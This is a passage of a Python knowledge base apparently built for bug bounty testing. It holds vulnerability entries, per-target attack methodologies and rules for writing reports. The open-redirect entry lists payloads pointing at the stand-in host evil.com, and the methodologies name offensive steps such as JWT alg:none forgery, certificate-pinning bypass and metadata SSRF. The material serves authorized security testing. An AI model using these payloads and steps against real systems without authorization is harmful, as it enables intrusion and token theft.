        "detection": {
            "method": "header_check",
            "technique": [
                "Check for X-Frame-Options header",
                "Check for CSP frame-ancestors directive",
                "If missing AND sensitive actions on page → frameable",
            ],
        },
        "is_critical_when": "Never — clickjacking is always Low/Medium",
        "impact": "UI redressing attacks. Tricking users into unintended actions.",
    },
    {
        "vuln_id": "MISC-006",
        "category": "misconfiguration",
        "title": "Open Redirect",
        "severity": "low",
        "cvss_score": 3.4,
        "cwe": "CWE-601",
        "detection": {
            "method": "redirect_parameter",
            "params": ["redirect", "url", "next", "return", "rurl", "dest", "destination", "go", "target"],
            "payloads": [
                "https://evil.com", "//evil.com", "/\\evil.com",
                "https://evil.com%00@legit.com", "https://legit.com@evil.com",
            ],
        },
        "is_critical_when": "Used in OAuth flow to steal tokens → High",
        "is_not_critical_when": "Standalone open redirect = Low (most programs don't pay for this)",
        "impact": "Phishing amplification. Token theft if in OAuth flow.",
    },
]

# ATTACK METHODOLOGY — How to approach different target types

METHODOLOGY = {
    "web_application": {
        "name": "Web Application Methodology",
        "phases": [
            {
                "phase": 1,
                "name": "Reconnaissance",
                "steps": [
                    "Subdomain enumeration (crt.sh, SecurityTrails, DNS brute)",
                    "Technology fingerprinting (Wappalyzer, HTTP headers, error pages)",
                    "JavaScript analysis (secrets, endpoints, API routes)",
                    "Sitemap/robots.txt analysis",
                    "Google dorking (site:target.com inurl:admin, filetype:pdf)",
                    "Wayback Machine for historical endpoints",
                ],
            },
            {
                "phase": 2,
                "name": "Mapping",
                "steps": [
                    "Crawl all pages and forms",
                    "Identify input points (params, headers, cookies)",
                    "Map API endpoints from JS bundles",
                    "Identify authentication mechanisms",
                    "Document all user roles and permissions",
                    "Identify file upload points",
                ],
            },
            {
                "phase": 3,
                "name": "Vulnerability Discovery",
                "steps": [
                    "Injection testing (SQLi, XSS, SSTI, CMDi)",
                    "Authentication testing (bypass, session, JWT)",
                    "Authorization testing (IDOR, privilege escalation)",
                    "Business logic testing (race conditions, price manipulation)",
                    "File upload testing (unrestricted, path traversal)",
                    "SSRF testing on URL parameters",
                    "GraphQL/API-specific attacks",
                ],
            },
            {
                "phase": 4,
                "name": "Exploitation & Validation",
                "steps": [
                    "Develop working PoC for each finding",
                    "Validate end-to-end impact",
                    "Test from different user contexts",
                    "Document exact reproduction steps",
                    "Capture request/response evidence",
                ],
            },
            {
                "phase": 5,
                "name": "Reporting",
                "steps": [
                    "Write detailed report per finding",
                    "Include exact curl commands for reproduction",
                    "Calculate accurate CVSS score",
                    "Provide specific remediation guidance",
                    "Attach screenshots/recordings",
                ],
            },
        ],
    },
    "api": {
        "name": "API Security Methodology",
        "phases": [
            {"phase": 1, "name": "Discovery", "steps": [
                "Find API documentation (Swagger, OpenAPI, GraphQL introspection)",
                "Extract API endpoints from mobile apps and JS bundles",
                "Version enumeration (/api/v1, /api/v2, /api/v3)",
                "Check authentication mechanisms (JWT, API key, OAuth)",
            ]},
            {"phase": 2, "name": "Authentication Testing", "steps": [
                "Test all OWASP API Top 10 categories",
                "JWT manipulation (alg:none, key confusion)",
                "API key scope testing (what can the key access?)",
                "Token lifecycle testing (expiry, revocation, rotation)",
            ]},
            {"phase": 3, "name": "Authorization Testing", "steps": [
                "BOLA/IDOR on every endpoint with object IDs",
                "Horizontal privilege escalation",
                "Vertical privilege escalation (user → admin endpoints)",
                "Mass assignment testing on create/update endpoints",
            ]},
            {"phase": 4, "name": "Injection & Logic", "steps": [
                "Injection testing on all parameters",
                "Rate limiting bypass",
                "GraphQL query complexity abuse",
                "Batch request abuse",
            ]},
        ],
    },
    "mobile_android": {
        "name": "Android Security Methodology",
        "phases": [
            {"phase": 1, "name": "Static Analysis", "steps": [
                "Decompile APK with jadx/apktool",
                "Review AndroidManifest.xml (exported components, permissions, debuggable)",
                "Search for hardcoded secrets in Java/Kotlin code",
                "Check network security config (cleartext, cert pinning)",
                "Analyze native libraries (.so) with strings/Ghidra",
                "Check for root detection and obfuscation",
            ]},
            {"phase": 2, "name": "Dynamic Analysis", "steps": [
                "Set up proxy (Burp/mitmproxy) with cert on device/emulator",
                "Intercept all API traffic",
                "Test API endpoints found in traffic",
                "Check local storage (SharedPreferences, SQLite, files)",
                "Test deeplinks and intent handling",
                "Hook methods with Frida for runtime bypass",
            ]},
            {"phase": 3, "name": "API Testing", "steps": [
                "Apply full API methodology to all endpoints found in traffic",
                "Test cert pinning bypass",
                "Check for sensitive data in logs/cache",
            ]},
        ],
    },
    "mobile_ios": {
        "name": "iOS Security Methodology",
        "phases": [
            {"phase": 1, "name": "Static Analysis", "steps": [
                "Extract IPA and analyze binary",
                "Check Info.plist (ATS, URL schemes, entitlements)",
                "Run strings on binary and frameworks",
                "Check for hardcoded secrets",
                "Analyze with class-dump for Obj-C headers",
            ]},
            {"phase": 2, "name": "Dynamic Analysis", "steps": [
                "Set up proxy and intercept traffic",
                "Dump Keychain items with objection",
                "Check NSUserDefaults for sensitive data",
                "Test URL scheme handling",
                "Hook methods with Frida",
                "Check clipboard leakage",
            ]},
            {"phase": 3, "name": "API Testing", "steps": [
                "Apply full API methodology to discovered endpoints",
                "Check for certificate pinning bypass",
            ]},
        ],
    },
    "infrastructure": {
        "name": "Infrastructure Methodology",
        "phases": [
            {"phase": 1, "name": "Port Scanning", "steps": [
                "Scan top 1000 ports on all in-scope IPs",
                "Service version detection",
                "Banner grabbing",
            ]},
            {"phase": 2, "name": "Service Analysis", "steps": [
                "Check for default credentials on all services",
                "Check database ports for auth bypass",
                "Check management interfaces (Grafana, Jenkins, Kibana)",
                "Spring Boot actuator, status pages",
            ]},
            {"phase": 3, "name": "Cloud Analysis", "steps": [
                "S3/Azure/GCP bucket enumeration",
                "Metadata SSRF testing",
                "Subdomain takeover scanning",
                "DNS zone transfer",
            ]},
        ],
    },
}

# REPORT QUALITY RULES — What makes a PERFECT bug bounty report

REPORT_RULES = {
    "required_sections": [
        "Title (clear, specific, includes vulnerability type and impact)",
        "Asset (exact URL/endpoint affected)",
        "Severity (with CVSS score and vector)",
        "Description (clear summary of what was found)",
        "Steps to Reproduce (numbered, exact commands, copy-pasteable)",
        "Impact (what an attacker can do, not theoretical but demonstrated)",
        "Remediation (specific, actionable, with code examples)",
        "Evidence (screenshots, request/response pairs, curl commands)",
    ],
    "title_format": "{VulnType} in {Endpoint} Allows {Impact}",
    "title_examples": [
        "SQL Injection in /api/v1/search?q= Allows Full Database Extraction",
        "IDOR in GET /api/orders/{id} Allows Accessing Any User's Order History",
        "Stored XSS in Profile Bio Field Affects All Users Viewing Profile",
        "WAF Bypass via Trailing Slash Exposes Spring Boot Actuator Health Endpoint on api.syfe.com",
    ],
    "steps_format": [
        "Each step must be EXACT — a triager must reproduce in <2 minutes",
        "Include full curl commands with all headers",
        "Include expected vs actual response",
        "Include before/after state for state-changing bugs",
    ],
    "severity_justification": [
        "ALWAYS explain WHY the severity is what it is",
        "Reference CVSS calculator factors (AV, AC, PR, UI, S, C, I, A)",
        "Compare to similar accepted reports on the same program",
        "If unsure, submit as Medium and let triager upgrade",
    ],
}


def get_vuln_by_id(vuln_id: str) -> dict | None:
    """Look up a vulnerability by its ID."""
    for v in MEGA_KB:
        if v["vuln_id"] == vuln_id:
            return v
    return None


def get_vulns_by_category(category: str) -> list[dict]:
    """Get all vulnerabilities in a category."""
    return [v for v in MEGA_KB if v["category"] == category]


def get_methodology(target_type: str) -> dict | None:
    """Get the attack methodology for a target type."""
    return METHODOLOGY.get(target_type)


def get_all_categories() -> list[str]:
    """Get all unique vulnerability categories."""
    return sorted(set(v["category"] for v in MEGA_KB))


def get_severity_rules() -> dict:
    """Get severity assessment rules."""
    return SEVERITY_RULES


def get_fp_rules(category: str) -> dict | None:
    """Get false positive elimination rules for a category."""
    return FALSE_POSITIVE_RULES.get(category)


def get_report_rules() -> dict:
    """Get report quality rules."""
    return REPORT_RULES
